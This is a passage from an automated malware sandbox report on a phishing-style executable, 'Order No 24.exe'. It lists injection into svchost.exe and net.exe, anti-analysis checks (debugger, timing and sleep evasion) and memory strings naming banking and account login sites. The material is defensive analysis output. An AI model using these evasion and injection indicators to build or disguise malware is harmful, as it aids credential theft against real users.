                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003AB83A push esp; iretd 4_2_003AB85B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_00397B3D push 0000007Bh; iretd 4_2_00397B3F
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003A5B30 push esp; ret 4_2_003A5D34
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003A5F1C push ss; ret 4_2_003A5F32
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C74360 push ss; retf 4_2_02C74366
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C85062 push eax; ret 4_2_02C85064
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C75170 push ss; ret 4_2_02C7518C
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C75AF0 push ds; ret 4_2_02C75AF1
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C7C967 push edi; retf 4_2_02C7C968
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C75936 push ecx; iretd 4_2_02C7593B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02C73CED push ss; retf 4_2_02C73D02
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_0099EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\Order No 24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Order No 24.exe API/Special instruction interceptor: Address: 1274B94
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004A8F53 rdtsc 2_2_004A8F53
                Source: C:\Windows\SysWOW64\net.exe Window / User API: threadDelayed 632
                Source: C:\Windows\SysWOW64\net.exe Window / User API: threadDelayed 9341
                Source: C:\Users\user\Desktop\Order No 24.exe Evaded block: after key decision graph_0-94317
                Source: C:\Users\user\Desktop\Order No 24.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94741
                Source: C:\Users\user\Desktop\Order No 24.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exe API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 2548 Thread sleep count: 632 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 2548 Thread sleep time: -1264000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 2548 Thread sleep count: 9341 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 2548 Thread sleep time: -18682000s >= -30000s
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568 Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568 Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568 Thread sleep time: -52500s >= -30000s
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568 Thread sleep count: 48 > 30
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe TID: 4568 Thread sleep time: -48000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_009C6CA9
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_009C60DD
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_009C63F9
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_009CEB60
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_009CF5FA
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009CF56F FindFirstFileW,FindClose, 0_2_009CF56F
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_009D1B2F
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_009D1C8A
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_009D1F94
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_003AC820 FindFirstFileW,FindNextFileW,FindClose, 4_2_003AC820
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0099DDC0
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: F14431U2a.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                Source: F14431U2a.4.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: F14431U2a.4.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,1
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: F14431U2a.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: vqiDHNHvZuv.exe, 00000007.00000002.4576994187.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.office.comVMware20,11696487552o
                Source: F14431U2a.4.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: F14431U2a.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: firefox.exe, 0000000A.00000002.2605771952.000001666CB5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: F14431U2a.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696)
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: F14431U2a.4.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: F14431U2a.4.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: saction PasswordVMware20,11696487552^
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,116]
                Source: F14431U2a.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: F14431U2a.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: net.exe, 00000004.00000002.4581952826.0000000007A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: look.office.comVMware20,11696487552s
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004A8F53 rdtsc 2_2_004A8F53
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004A7B93 LdrLoadDll, 2_2_004A7B93
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009D6AAF BlockInput, 0_2_009D6AAF
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00983D19
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_009B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_009B3920
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_0099E01E LoadLibraryA,GetProcAddress, 0_2_0099E01E
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_01273780 mov eax, dword ptr fs:[00000030h] 0_2_01273780
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_01274E00 mov eax, dword ptr fs:[00000030h] 0_2_01274E00
                Source: C:\Users\user\Desktop\Order No 24.exe Code function: 0_2_01274E60 mov eax, dword ptr fs:[00000030h] 0_2_01274E60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h] 2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h] 2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h] 2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h] 2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h] 2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
